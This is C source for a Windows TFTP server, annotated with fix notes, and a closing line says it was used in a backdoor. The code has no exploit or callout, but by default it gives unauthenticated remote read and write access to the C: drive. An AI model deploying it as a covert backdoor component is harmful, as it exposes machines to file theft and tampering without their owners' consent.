文章作者:zvrop
代码:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#define TIMEOUT_USECS 1000000
#define MAX_TIMEOUT 32000000
/* Per-session context handed to SrartTFTP(). UserSck is the session id that
   rnvCasemsg() receives with every status message. */
typedef struct UCS
{
    short UserSck;
} UCS;
/* Start the server thread with the options in Comline (see SrartTFTP()). */
void SrartTFTP(UCS *usck,char *Comline);
/* Close the listening socket and wait for the server thread to exit. */
void StopTFTP();
UCS *sck;                 /* session that status messages go to; set by SrartTFTP() */
/* 1 while the listener thread is bound and running, 0 otherwise. Written by
   createTFTP(), polled by SrartTFTP()/StopTFTP() in Sleep() loops; there is
   no other synchronisation on it. */
int ExitOfTFTP=0;
SOCKET server;            /* UDP listening socket bound to lisPort */
/* lisPort: listening port. canRed/canWri: allow read/write requests.
   redPort/wriPort: first local port tried for a read/write transfer socket.
   Every SrartTFTP() call resets all of them to these defaults. */
int lisPort=69,canRed=1,canWri=1,redPort=10471,wriPort=11471;
char bootPath[MAX_PATH]="c:";   /* directory served; request names are appended after "\" */
/* Wire layout of a DATA (opcode 3) or ERROR (opcode 5) packet.
   The two header fields travel in network byte order (htons/ntohs); they are
   declared `short` but are only ever written through htons, so the 2-byte
   layout is what matters. */
struct sendbuf
{
    short pctcode;    /* opcode */
    short pakecode;   /* block number (DATA) or error code (ERROR) */
    char buff[512];   /* up to 512 bytes of file data, or the error message */
};
/* A request datagram as received by the listener. For RRQ/WRQ (opcodes 1/2)
   buff starts with the file name, which the workers use as a C string. */
struct readbuf
{
    short pctcode;    /* opcode, network byte order */
    char buff[512];   /* rest of the datagram; not NUL-terminated by the wire format */
};
/* Wire layout of an ACK packet (opcode 4): the block being acknowledged. */
struct ackbuf
{
    short pctcode;    /* opcode, network byte order */
    short block;      /* block number, network byte order */
};
/* Argument block handed to getfile()/putfile() on their own thread. It holds
   pointers, not copies: whoever creates it must keep the pointed-to address
   and buffer alive for as long as the worker thread can use them. */
struct canstk
{
    SOCKET gsock;                    /* listening socket, used to send early errors */
    struct sockaddr_in * readstk;    /* client address replies go to */
    char * buff;                     /* request payload (file name as a C string) */
};
//---------------------------------------------------------------------
/* Send a TFTP ERROR packet carrying `msg` from psock to sandstk. */
void error(SOCKET psock, struct sockaddr_in * sandstk,char *msg);
/* Worker threads: serve a read request / store a write request.
   lpParam is a struct canstk*. */
DWORD WINAPI getfile(LPVOID lpParam);
DWORD WINAPI putfile(LPVOID lpParam);
/* Listener thread: receives requests on lisPort and dispatches them to the workers. */
DWORD WINAPI createTFTP(LPVOID lpParam);
//------------------------
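/*
 * Split a command line into up to 10 space-separated arguments.
 *
 * comm     NUL-terminated command line; a trailing "\r\n" or "\n" is ignored.
 * cmdline  destination: 10 consecutive slots of `cont` bytes each (the caller
 *          passes &cmdline[0][0] of a char[10][512] with cont = 512).
 * cont     width of one slot in bytes. Each argument is truncated to cont-1
 *          characters and always NUL-terminated, so it can never spill into
 *          the next slot (the original strncpy had no bound at all).
 *
 * Returns the number of slots filled (0..10). Consecutive spaces yield empty
 * arguments. An input without a line terminator is split as-is; the original
 * silently dropped its last character.
 */
int WINAPI getcmdline(char *comm,char *cmdline,short cont)
{
    enum { MAX_ARGS = 10 };
    size_t len = strlen(comm);
    size_t slot = (cont > 0) ? (size_t)cont : 0;

    /* Strip the line terminator without reading before the start of comm. */
    if (len >= 2 && strncmp(comm + len - 2, "\r\n", 2) == 0)
        len -= 2;
    else if (len >= 1 && comm[len - 1] == '\n')
        len -= 1;

    if (slot == 0)
        return 0;

    size_t geti = 0;   /* next slot to fill */
    size_t befi = 0;   /* start of the current argument */
    for (size_t i = 0; i <= len && geti < MAX_ARGS; i++) {
        if (i == len || comm[i] == ' ') {
            size_t n = i - befi;
            if (n > slot - 1)
                n = slot - 1;   /* leave room for the terminator */
            char *dst = cmdline + geti * slot;
            memcpy(dst, comm + befi, n);
            dst[n] = '\0';
            geti++;
            befi = i + 1;
        }
    }
    return (int)geti;
}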
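/*
 * Print a status message for the controlling session.
 *
 * a    session id (UCS.UserSck); currently unused, output goes to stdout.
 * msg  NUL-terminated text, printed verbatim. A NULL msg prints nothing.
 *
 * msg is never used as a printf format string, so a message containing
 * '%' is printed literally instead of being interpreted.
 */
void rnvCasemsg(short a,char *msg)
{
    (void)a;
    if (msg != NULL)
        fputs(msg, stdout);
}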
//------------------------------
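/*
 * Everything one worker thread needs, owned by that thread. The listener
 * used to hand the workers pointers into its own loop-local variables, which
 * the next recvfrom() overwrote while a worker could still be reading them;
 * one heap copy per request removes that race.
 */
struct tftp_request {
    struct sockaddr_in addr;   /* client address the replies go to */
    char name[513];            /* request payload, always NUL-terminated */
    struct canstk cank;        /* the view getfile()/putfile() expect */
};

/* Thread entry for a read request: run getfile() on an owned request, then free it. */
static DWORD WINAPI getfile_owned(LPVOID lpParam)
{
    struct tftp_request *req = (struct tftp_request *)lpParam;
    DWORD rc = getfile(&req->cank);
    free(req);
    return rc;
}

/* Thread entry for a write request: run putfile() on an owned request, then free it. */
static DWORD WINAPI putfile_owned(LPVOID lpParam)
{
    struct tftp_request *req = (struct tftp_request *)lpParam;
    DWORD rc = putfile(&req->cank);
    free(req);
    return rc;
}

/*
 * Copy one request datagram into a freshly allocated tftp_request.
 *
 * s                    listening socket, stored as cank.gsock.
 * from                 sender address, copied.
 * payload/payload_len  the bytes after the 2-byte opcode. RRQ/WRQ carry
 *                      "filename\0mode\0", so a payload without any NUL is
 *                      malformed and rejected instead of being read past
 *                      its end as a string.
 *
 * Returns NULL on a malformed payload or allocation failure; the caller
 * frees the result (or the worker thread does).
 */
static struct tftp_request *new_request(SOCKET s, const struct sockaddr_in *from,
                                        const char *payload, size_t payload_len)
{
    if (payload_len == 0 || memchr(payload, '\0', payload_len) == NULL)
        return NULL;
    struct tftp_request *req = (struct tftp_request *)calloc(1, sizeof *req);
    if (req == NULL)
        return NULL;
    if (payload_len > sizeof(req->name) - 1)
        payload_len = sizeof(req->name) - 1;   /* defensive; readbuf.buff is 512 bytes */
    req->addr = *from;
    memcpy(req->name, payload, payload_len);
    req->cank.gsock = s;
    req->cank.readstk = &req->addr;
    req->cank.buff = req->name;
    return req;
}

/*
 * Listener thread (started by SrartTFTP()): bind a UDP socket to lisPort and
 * hand every RRQ (opcode 1) to getfile() and every WRQ (opcode 2) to
 * putfile(), each on its own thread. Any other opcode gets an ERROR reply.
 *
 * lpParam  unused.
 *
 * ExitOfTFTP is set to 1 once the socket is bound and back to 0 when the
 * loop ends; SrartTFTP()/StopTFTP() poll it. The loop ends when select() or
 * recvfrom() fails, e.g. after StopTFTP() closes `server`.
 *
 * Returns 0 on a setup or select() failure, 1 after a recvfrom() failure.
 */
DWORD WINAPI createTFTP(LPVOID lpParam)
{
    (void)lpParam;
    WSADATA WSAData;
    if (WSAStartup(MAKEWORD(2, 2), &WSAData)) {
        rnvCasemsg(sck->UserSck, "SOCKET DLL 设置出错!");
        return 0;
    }
    server = socket(AF_INET, SOCK_DGRAM, 0);
    if (server == INVALID_SOCKET) {
        rnvCasemsg(sck->UserSck, "SOCKET error!\r\n");
        return 0;
    }

    struct sockaddr_in sockAddr;
    ZeroMemory(&sockAddr, sizeof(sockAddr));
    sockAddr.sin_family = AF_INET;
    sockAddr.sin_port = htons((unsigned short)lisPort);
    sockAddr.sin_addr.S_un.S_addr = INADDR_ANY;   /* accept on every local address */
    if (bind(server, (LPSOCKADDR)&sockAddr, sizeof(sockAddr)) == SOCKET_ERROR) {
        rnvCasemsg(sck->UserSck, "Bind error!\r\n");
        closesocket(server);
        server = INVALID_SOCKET;
        return 0;
    }

    struct readbuf readbuff;
    ExitOfTFTP = 1;
    for (;;) {
        fd_set fdread;
        FD_ZERO(&fdread);
        FD_SET(server, &fdread);   /* select() clears the set, so re-arm it every pass */
        if (select((int)server + 1, &fdread, NULL, NULL, NULL) == SOCKET_ERROR) {
            ExitOfTFTP = 0;
            return 0;
        }

        struct sockaddr_in client;
        int clientlen = sizeof(client);
        ZeroMemory(&readbuff, sizeof(readbuff));
        int rect = recvfrom(server, (char *)&readbuff, sizeof(readbuff), 0,
                            (struct sockaddr *)&client, &clientlen);
        if (rect <= 0) {
            ExitOfTFTP = 0;
            break;
        }
        if (rect < 2)
            continue;   /* too short to even carry an opcode */

        unsigned short op = ntohs(readbuff.pctcode);
        if (op != 1 && op != 2) {
            error(server, &client, "不知道的错误!");
            continue;
        }

        struct tftp_request *req =
            new_request(server, &client, readbuff.buff, (size_t)rect - 2);
        if (req == NULL) {
            error(server, &client, "Bad request!");
            continue;
        }
        DWORD funid;
        HANDLE worker = CreateThread(NULL, 0, op == 1 ? getfile_owned : putfile_owned,
                                     req, 0, &funid);
        if (worker == NULL) {
            error(server, &client, "Thread error!");
            free(req);
            continue;
        }
        CloseHandle(worker);   /* the thread keeps running; only our handle is released */
    }
    return 1;
}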
//--------------------------------------------------------------------------
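/*
 * Build the on-disk path for a read request: bootPath + "\" + name.
 *
 * Returns 1 and fills `out` on success. Returns 0 for an empty name, an
 * absolute path, a name containing a drive letter (':') or "..", or a path
 * that would not fit in `cap` bytes, so a request cannot reach outside
 * bootPath or overflow the path buffer.
 */
static int getfile_build_path(char *out, size_t cap, const char *name)
{
    if (name == NULL || name[0] == '\0')
        return 0;
    if (name[0] == '\\' || name[0] == '/' ||
        strchr(name, ':') != NULL || strstr(name, "..") != NULL)
        return 0;
    int n = snprintf(out, cap, "%s\\%s", bootPath, name);
    return n > 0 && (size_t)n < cap;
}

/*
 * Worker thread for a read request (RRQ, opcode 1): send the requested file
 * to the client in 512-byte DATA blocks, waiting for the matching ACK after
 * each one.
 *
 * lpParam  struct canstk*: listening socket, client address and the request
 *          payload (NUL-terminated file name). The storage must stay valid
 *          until this thread returns.
 *
 * Returns 0 if no transfer was started, 1 otherwise. Failures are reported
 * to the client with error().
 *
 * Compared with the first version: the transfer socket binds to INADDR_ANY
 * (binding to the client's address cannot succeed for a remote client) on
 * the first free port at or above redPort, with a bounded search; the
 * select() set is re-armed before every wait (select() empties it, so the
 * old `goto again` re-entered select() with an empty set); the current block
 * is retransmitted on timeout with the wait doubled up to MAX_TIMEOUT;
 * datagrams from any other address/port and ACKs for older blocks are
 * ignored; the final short block is also waited for; and the address length
 * passed to sendto() is the address size, not the pointer size.
 */
DWORD WINAPI getfile(LPVOID lpParam)
{
    enum { BLOCK_SIZE = 512, HEADER_SIZE = 4, PORT_TRIES = 100 };
    struct canstk *cansk = (struct canstk *)lpParam;

    if (!canRed) {
        error(cansk->gsock, cansk->readstk, "Write only!");
        return 0;
    }

    SOCKET sendserver = socket(AF_INET, SOCK_DGRAM, 0);
    if (sendserver == INVALID_SOCKET) {
        error(cansk->gsock, cansk->readstk, "SOCKET error!");
        return 0;
    }

    /* Bind the per-transfer socket to a local port: redPort, redPort+1, ... */
    struct sockaddr_in local;
    ZeroMemory(&local, sizeof(local));
    local.sin_family = AF_INET;
    local.sin_addr.S_un.S_addr = INADDR_ANY;
    int bound = 0;
    for (int portad = 0; portad < PORT_TRIES && !bound; portad++) {
        local.sin_port = htons((unsigned short)(redPort + portad));
        bound = bind(sendserver, (LPSOCKADDR)&local, sizeof(local)) != SOCKET_ERROR;
    }
    if (!bound) {
        error(cansk->gsock, cansk->readstk, "Bind error!");
        closesocket(sendserver);
        return 0;
    }

    char filename[MAX_PATH];
    if (!getfile_build_path(filename, sizeof(filename), cansk->buff)) {
        error(sendserver, cansk->readstk, "Bad file name!");
        closesocket(sendserver);
        return 0;
    }

    /* FILE_SHARE_READ lets several clients fetch the same file at once. */
    HANDLE rFile = CreateFile(filename, GENERIC_READ, FILE_SHARE_READ, NULL,
                              OPEN_EXISTING, 0, NULL);
    if (rFile == INVALID_HANDLE_VALUE) {
        error(sendserver, cansk->readstk, "Can not find file~");
        closesocket(sendserver);
        return 1;
    }

    unsigned short block = 1;   /* TFTP block numbers start at 1 and wrap at 65535 */
    DWORD readnum = 0;
    struct sendbuf sendk;
    do {
        ZeroMemory(&sendk, sizeof(sendk));
        if (!ReadFile(rFile, sendk.buff, BLOCK_SIZE, &readnum, NULL)) {
            error(sendserver, cansk->readstk, "Read file fail!");
            goto ext;
        }
        sendk.pctcode = htons(3);
        sendk.pakecode = htons(block);
        int pktlen = (int)(readnum + HEADER_SIZE);

        unsigned long timeout = TIMEOUT_USECS;
        int acked = 0;
        while (!acked) {
            if (sendto(sendserver, (const char *)&sendk, pktlen, 0,
                       (struct sockaddr *)cansk->readstk, sizeof(*cansk->readstk)) != pktlen) {
                error(sendserver, cansk->readstk, "Send data fail!");
                goto ext;
            }

            /* Wait for ACK `block`; keep reading until it arrives or we time out. */
            for (;;) {
                fd_set fds;
                FD_ZERO(&fds);
                FD_SET(sendserver, &fds);   /* select() clears the set: re-arm every time */
                struct timeval tv;
                tv.tv_sec = (long)(timeout / 1000000UL);
                tv.tv_usec = (long)(timeout % 1000000UL);
                int nfds = select((int)sendserver + 1, &fds, NULL, NULL, &tv);
                if (nfds < 0) {
                    error(sendserver, cansk->readstk, "Recv file fail!");
                    goto ext;
                }
                if (nfds == 0)
                    break;   /* timed out: retransmit below */

                struct sockaddr_in from;
                int from_len = sizeof(from);
                struct ackbuf abuff;
                ZeroMemory(&abuff, sizeof(abuff));
                int got = recvfrom(sendserver, (char *)&abuff, sizeof(abuff), 0,
                                   (struct sockaddr *)&from, &from_len);
                if (got <= 0) {
                    error(sendserver, cansk->readstk, "Recv ack fail!");
                    goto ext;
                }
                /* Only the client that sent the request may drive this transfer. */
                if (from.sin_addr.S_un.S_addr != cansk->readstk->sin_addr.S_un.S_addr ||
                    from.sin_port != cansk->readstk->sin_port || got < HEADER_SIZE)
                    continue;

                unsigned short op = ntohs(abuff.pctcode);
                if (op == 5) {
                    error(sendserver, cansk->readstk, "Client error!");
                    goto ext;
                }
                if (op != 4) {
                    error(sendserver, cansk->readstk, "Unknow error!");
                    goto ext;
                }
                if (ntohs(abuff.block) == block) {
                    acked = 1;
                    break;
                }
                /* ACK for an older block: ignore it rather than retransmit,
                   otherwise every duplicate ACK doubles the traffic
                   (the "Sorcerer's Apprentice" problem, RFC 1123 4.2.3.1). */
            }

            if (!acked) {
                if (timeout >= MAX_TIMEOUT) {
                    error(sendserver, cansk->readstk, "Recv ack timeout!");
                    goto ext;
                }
                timeout <<= 1;
            }
        }
        block++;
    } while (readnum == BLOCK_SIZE);   /* a short (or empty) block ends the transfer */

ext:
    CloseHandle(rFile);
    closesocket(sendserver);
    return 1;
}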
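/*
 * Build the on-disk path for a write request: bootPath + "\" + name.
 *
 * Returns 1 and fills `out` on success. Returns 0 for an empty name, an
 * absolute path, a name containing a drive letter (':') or "..", or a path
 * that would not fit in `cap` bytes, so a client cannot write outside
 * bootPath or overflow the path buffer.
 */
static int putfile_build_path(char *out, size_t cap, const char *name)
{
    if (name == NULL || name[0] == '\0')
        return 0;
    if (name[0] == '\\' || name[0] == '/' ||
        strchr(name, ':') != NULL || strstr(name, "..") != NULL)
        return 0;
    int n = snprintf(out, cap, "%s\\%s", bootPath, name);
    return n > 0 && (size_t)n < cap;
}

/* Send ACK `block` to the client; returns 1 when the whole packet went out. */
static int putfile_send_ack(SOCKET s, const struct sockaddr_in *to, unsigned short block)
{
    struct ackbuf reack;
    reack.pctcode = htons(4);
    reack.block = htons(block);
    return sendto(s, (const char *)&reack, sizeof(reack), 0,
                  (const struct sockaddr *)to, sizeof(*to)) == (int)sizeof(reack);
}

/*
 * Worker thread for a write request (WRQ, opcode 2): acknowledge the request
 * with ACK 0, then store each DATA block the client sends, acknowledging it,
 * until a block shorter than 512 bytes arrives.
 *
 * lpParam  struct canstk*: listening socket, client address and the request
 *          payload (NUL-terminated file name). The storage must stay valid
 *          until this thread returns.
 *
 * Returns 0 if no transfer was started, 1 otherwise. Failures are reported
 * to the client with error().
 *
 * Compared with the first version: the transfer socket binds to INADDR_ANY
 * on the first free port at or above wriPort (the retry loop used redPort);
 * the file is opened with GENERIC_WRITE only; the select() set is re-armed
 * before every wait; the last ACK is repeated on timeout and on a duplicate
 * DATA block instead of corrupting the expected block number; datagrams from
 * any other address/port are ignored; a WriteFile failure or short write is
 * treated as an error (the two nested ifs only caught both together); the
 * transfer ends after the short block; and sendto() gets the address size,
 * not the pointer size.
 */
DWORD WINAPI putfile(LPVOID lpParam)
{
    enum { BLOCK_SIZE = 512, HEADER_SIZE = 4, PORT_TRIES = 100 };
    struct canstk *cansk = (struct canstk *)lpParam;

    if (!canWri) {
        error(cansk->gsock, cansk->readstk, "Read only!");
        return 0;
    }

    SOCKET recvserver = socket(AF_INET, SOCK_DGRAM, 0);
    if (recvserver == INVALID_SOCKET) {
        error(cansk->gsock, cansk->readstk, "SOCKET error!");
        return 0;
    }

    /* Bind the per-transfer socket to a local port: wriPort, wriPort+1, ... */
    struct sockaddr_in local;
    ZeroMemory(&local, sizeof(local));
    local.sin_family = AF_INET;
    local.sin_addr.S_un.S_addr = INADDR_ANY;
    int bound = 0;
    for (int portad = 0; portad < PORT_TRIES && !bound; portad++) {
        local.sin_port = htons((unsigned short)(wriPort + portad));
        bound = bind(recvserver, (LPSOCKADDR)&local, sizeof(local)) != SOCKET_ERROR;
    }
    if (!bound) {
        error(cansk->gsock, cansk->readstk, "Bind error!");
        closesocket(recvserver);
        return 0;
    }

    char filename[MAX_PATH];
    if (!putfile_build_path(filename, sizeof(filename), cansk->buff)) {
        error(recvserver, cansk->readstk, "Bad file name!");
        closesocket(recvserver);
        return 0;
    }

    /* CREATE_ALWAYS keeps the original semantics: an existing file is replaced. */
    HANDLE wFile = CreateFile(filename, GENERIC_WRITE, FILE_SHARE_READ, NULL,
                              CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (wFile == INVALID_HANDLE_VALUE) {
        error(recvserver, cansk->readstk, "Can not find file~");
        closesocket(recvserver);
        return 1;
    }

    unsigned short block = 0;   /* number of the last block we acknowledged */
    if (!putfile_send_ack(recvserver, cansk->readstk, block)) {
        error(recvserver, cansk->readstk, "Send file fail!");
        goto ext;
    }

    for (;;) {
        unsigned long timeout = TIMEOUT_USECS;
        struct sendbuf revbuff;
        int got = 0;

        /* Wait for DATA block+1, re-ACKing the last block when needed. */
        for (;;) {
            fd_set fds;
            FD_ZERO(&fds);
            FD_SET(recvserver, &fds);   /* select() clears the set: re-arm every time */
            struct timeval tv;
            tv.tv_sec = (long)(timeout / 1000000UL);
            tv.tv_usec = (long)(timeout % 1000000UL);
            int nfds = select((int)recvserver + 1, &fds, NULL, NULL, &tv);
            if (nfds < 0) {
                error(recvserver, cansk->readstk, "Recv data fail!");
                goto ext;
            }
            if (nfds == 0) {
                if (timeout >= MAX_TIMEOUT) {
                    error(recvserver, cansk->readstk, "Recv ack timeout!");
                    goto ext;
                }
                timeout <<= 1;
                /* Our ACK may have been lost: repeat it so the client resends. */
                if (!putfile_send_ack(recvserver, cansk->readstk, block)) {
                    error(recvserver, cansk->readstk, "Send data fail!");
                    goto ext;
                }
                continue;
            }

            struct sockaddr_in from;
            int from_len = sizeof(from);
            ZeroMemory(&revbuff, sizeof(revbuff));
            got = recvfrom(recvserver, (char *)&revbuff, sizeof(revbuff), 0,
                           (struct sockaddr *)&from, &from_len);
            if (got <= 0) {
                error(recvserver, cansk->readstk, "Recv ack fail!");
                goto ext;
            }
            /* Only the client that sent the request may drive this transfer. */
            if (from.sin_addr.S_un.S_addr != cansk->readstk->sin_addr.S_un.S_addr ||
                from.sin_port != cansk->readstk->sin_port || got < HEADER_SIZE)
                continue;

            unsigned short op = ntohs(revbuff.pctcode);
            if (op == 4 || op == 5) {
                error(recvserver, cansk->readstk, "Client error!");
                goto ext;
            }
            if (op != 3) {
                error(recvserver, cansk->readstk, "Unknow error!");
                goto ext;
            }
            unsigned short bn = ntohs(revbuff.pakecode);
            if (bn == (unsigned short)(block + 1))
                break;   /* the block we are waiting for */
            if (bn == block) {
                /* Duplicate of a block already stored: the client missed our ACK. */
                if (!putfile_send_ack(recvserver, cansk->readstk, block)) {
                    error(recvserver, cansk->readstk, "Send data fail!");
                    goto ext;
                }
                continue;
            }
            error(recvserver, cansk->readstk, "Ack error!");
            goto ext;
        }

        DWORD datalen = (DWORD)(got - HEADER_SIZE);
        DWORD writenum = 0;
        if (!WriteFile(wFile, revbuff.buff, datalen, &writenum, NULL) || writenum != datalen) {
            error(recvserver, cansk->readstk, "Write file error!");
            goto ext;
        }
        block++;
        if (!putfile_send_ack(recvserver, cansk->readstk, block)) {
            error(recvserver, cansk->readstk, "Send data fail!");
            goto ext;
        }
        if (datalen < BLOCK_SIZE)
            break;   /* a short block is the last one */
    }

ext:
    CloseHandle(wFile);
    closesocket(recvserver);
    return 1;
}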
//------------------------------------------------------------------------
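/*
 * Send a TFTP ERROR packet (opcode 5, error code 0) to the peer.
 *
 * psock    socket to send from.
 * sandstk  peer address the packet goes to.
 * msg      NUL-terminated message; truncated to fit the 512-byte payload.
 *          NULL sends an empty message.
 *
 * Only the 4-byte header, the message and its terminating NUL are sent; the
 * original sent the whole 516-byte struct, including uninitialised stack
 * bytes, and passed sizeof(pointer) as the address length. Send failures are
 * ignored: this is already the error path.
 */
void error(SOCKET psock, struct sockaddr_in * sandstk,char *msg)
{
    struct sendbuf sendk;
    ZeroMemory(&sendk, sizeof(sendk));
    sendk.pctcode = htons(5);
    sendk.pakecode = htons(0);
    if (msg != NULL)
        snprintf(sendk.buff, sizeof(sendk.buff), "%s", msg);
    size_t msglen = strlen(sendk.buff) + 1;   /* include the terminating NUL */
    /* 4 = the two 16-bit header fields in front of buff */
    sendto(psock, (const char *)&sendk, (int)(4 + msglen), 0,
           (struct sockaddr *)sandstk, sizeof(*sandstk));
}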
//-------------------------------------------------------------------------
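/*
 * Parse a decimal port number. Returns 1 and stores it in *out when `s` is a
 * complete number in 1..65499 (the bounds the original checks enforced),
 * 0 otherwise. No errno check is needed: strtol's LONG_MAX/LONG_MIN on
 * overflow fail the range test anyway.
 */
static int parse_port(const char *s, int *out)
{
    char *end = NULL;
    long v = strtol(s, &end, 10);
    if (s[0] == '\0' || end == s || *end != '\0')
        return 0;
    if (v <= 0 || v >= 65500)
        return 0;
    *out = (int)v;
    return 1;
}

/*
 * Start the TFTP server.
 *
 * usck     session that receives status messages (stored in the global sck).
 * Comline  option string, space separated, each option written "-X=value"
 *          (the value is read from the fourth character on, as before):
 *            -P=port  listening port (default 69)
 *            -R       refuse read requests      -W  refuse write requests
 *            -B=dir   directory to serve (default "c:")
 *            -I=port  first port for read transfers (default 10471)
 *            -O=port  first port for write transfers (default 11471)
 *          Unknown options are ignored. Every call starts from the defaults.
 *          NULL is treated as an empty option string.
 *
 * Starts createTFTP() on its own thread and waits up to ~1 s for it to set
 * ExitOfTFTP to 1. Does nothing if the server is already running. Ports
 * that do not parse, and an empty or over-long -B directory, abort the
 * start with a message.
 */
void SrartTFTP(UCS *usck,char *Comline)
{
    enum { MAX_ARGS = 10, ARG_LEN = 512 };
    sck = usck;
    if (ExitOfTFTP == 1) {
        rnvCasemsg(sck->UserSck, "TFTP's running!\r\n");
        return;
    }

    lisPort = 69; canRed = 1; canWri = 1; redPort = 10471; wriPort = 11471;
    strcpy(bootPath, "c:");

    char empty[1] = "";
    char cmdline[MAX_ARGS][ARG_LEN] = {""};
    int argc = getcmdline(Comline != NULL ? Comline : empty, &cmdline[0][0], ARG_LEN);
    if (argc > MAX_ARGS)
        argc = MAX_ARGS;

    for (int i = 0; i < argc; i++) {
        const char *arg = cmdline[i];
        if (arg[0] != '-' || arg[1] == '\0')
            continue;   /* cmdline[i]==NULL could never be true for an array */
        /* "-X=value": never step past the terminator of a bare "-X" */
        const char *val = (arg[2] != '\0') ? arg + 3 : "";

        switch (toupper((unsigned char)arg[1])) {
        case 'P':
            if (!parse_port(val, &lisPort)) {
                rnvCasemsg(sck->UserSck, "LisPort error!");
                return;
            }
            break;
        case 'R':
            canRed = 0;
            break;
        case 'W':
            canWri = 0;
            break;
        case 'B': {
            /* bounded copy; the old strncpy used strlen(src) as the limit */
            int n = snprintf(bootPath, sizeof(bootPath), "%s", val);
            if (val[0] == '\0' || n < 0 || (size_t)n >= sizeof(bootPath)) {
                rnvCasemsg(sck->UserSck, "BootPath error!");
                return;
            }
            break;
        }
        case 'I':
            if (!parse_port(val, &redPort)) {
                rnvCasemsg(sck->UserSck, "ReadPort error!");
                return;
            }
            break;
        case 'O':
            if (!parse_port(val, &wriPort)) {
                rnvCasemsg(sck->UserSck, "WriPort error!");
                return;
            }
            break;
        default:
            break;   /* unknown switch: ignored, as before */
        }
    }

    ExitOfTFTP = 0;
    DWORD dwThreadID;
    HANDLE th = CreateThread(NULL, 0, &createTFTP, NULL, 0, &dwThreadID);
    if (th == NULL) {
        rnvCasemsg(sck->UserSck, "Thread error!\r\n");
        return;
    }
    CloseHandle(th);   /* the thread keeps running; only our handle is released */

    int waited = 0;
    while (ExitOfTFTP == 0) {
        Sleep(50);
        rnvCasemsg(sck->UserSck, ".");
        if (waited++ > 20) {
            rnvCasemsg(sck->UserSck, "Timeout!\r\n");
            return;
        }
    }
    rnvCasemsg(sck->UserSck, "Start TFTP successfully!\r\n");
}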
/*
 * Stop the TFTP server.
 *
 * Closing `server` makes the listener's blocking select() fail, which makes
 * createTFTP() clear ExitOfTFTP on its way out. We then poll that flag every
 * 50 ms, printing a dot per poll, and give up with "Timeout!" after 42 polls
 * (about 2 s). Prints a message and returns if the server is not running.
 */
void StopTFTP()
{
    if (ExitOfTFTP == 0) {
        rnvCasemsg(sck->UserSck, "TFTP no runing in it!\r\n");
        return;
    }

    closesocket(server);

    for (int polls = 0; ExitOfTFTP == 1; polls++) {
        Sleep(50);
        rnvCasemsg(sck->UserSck, ".");
        if (polls > 40) {
            rnvCasemsg(sck->UserSck, "Timeout!\r\n");
            return;
        }
    }

    rnvCasemsg(sck->UserSck, "Stop TFTP successfully!\r\n");
} //================================================
一个后门中用到的tftp服务器的源代码